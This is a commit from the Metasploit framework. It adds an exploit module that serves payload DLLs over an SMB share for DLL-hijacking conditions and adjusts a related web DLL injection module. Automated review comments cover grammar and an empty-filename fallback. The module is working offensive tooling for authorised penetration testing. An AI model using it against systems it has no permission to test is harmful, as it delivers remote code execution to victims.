Land #3294, @0x41414141's generic dll injection through SMB shared folder

bug/bundler_fix
jvazquez-r7 2015-03-04 16:42:24 -06:00
commit b9a30d60d4
2 changed files with 72 additions and 1 deletions


@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Generic Web Application DLL Injection', 'Name' => 'Generic Web Application DLL Injection',
'Description' => %q{ 'Description' => %q{
This is a general-purpose module for exploiting conditions where a HTTP request This is a general-purpose module for exploiting conditions where a HTTP request
triggers a DLL load from a specified SMB share. This module serves payloads as triggers a DLL load from an specified SMB share. This module serves payloads as
DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
trigger the load of the DLL. trigger the load of the DLL.
}, },
@ -29,6 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false, 'Privileged' => false,
'Arch' => [ARCH_X86, ARCH_X86_64], 'Arch' => [ARCH_X86, ARCH_X86_64],
'Stance' => Msf::Exploit::Stance::Aggressive, 'Stance' => Msf::Exploit::Stance::Aggressive,
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'References' => 'References' =>
[ [
['CWE', '427'] ['CWE', '427']
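Review bot: The only textual change in the first hunk, in the 'Description' heredoc at the line starting "triggers a DLL load from", swaps "a specified SMB share" and "an specified SMB share"; the side-by-side rendering does not make clear which column is the new side, but "an specified" is the ungrammatical form, so if that is what lands the wording regresses and should read `triggers a DLL load from a specified SMB share. This module serves payloads as`. The same phrase appears in the new module's 'Description' in the second file section ("from an specified SMB share") and should be corrected there as well. The 'Payload' hash added in the second hunk ('Space' => 2048, 'DisableNops' => true) duplicates the one in the new module verbatim, which is consistent, though whether 2048 matches the space actually available in the DLL template used by generate_payload_dll cannot be confirmed from this hunk. The enclosing initialize call starts and ends outside both hunks.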


@ -0,0 +1,66 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => 'Generic DLL Injection From Shared Resource',
'Description' => %q{
This is a general-purpose module for exploiting conditions where a DLL can be loaded
from an specified SMB share. This module serves payloads as DLLs over an SMB service.
},
'Author' =>
[
'Matthew Hall <hallm[at]sec-1.com>'
],
'References' =>
[
['CWE', '114']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => false,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X86_64],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 04 2015'
))
register_options(
[
OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)'])
], self.class)
deregister_options('FILE_CONTENTS')
end
def setup
super
self.file_contents = generate_payload_dll
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
print_status("File available on #{unc}...")
end
end
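Review bot: In `setup`, `datastore['FILE_NAME'] || "#{...}.dll"` only falls back to the random name when the option is nil; an empty string is truthy in Ruby, so a FILE_NAME set to "" is accepted and the share would be configured with an empty file name, since the option is declared with required false and no further validation. A safer form is `self.file_name = datastore['FILE_NAME'].to_s.empty? ? "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" : datastore['FILE_NAME']`. Note also that `super` runs before `file_contents` and `file_name` are assigned; whether the Share mixin's own setup reads those attributes (and so sees the values it derives from the datastore rather than the generated DLL) cannot be confirmed from this hunk and is worth checking against the mixin. Finally, the description string "from an specified SMB share" should read "from a specified SMB share".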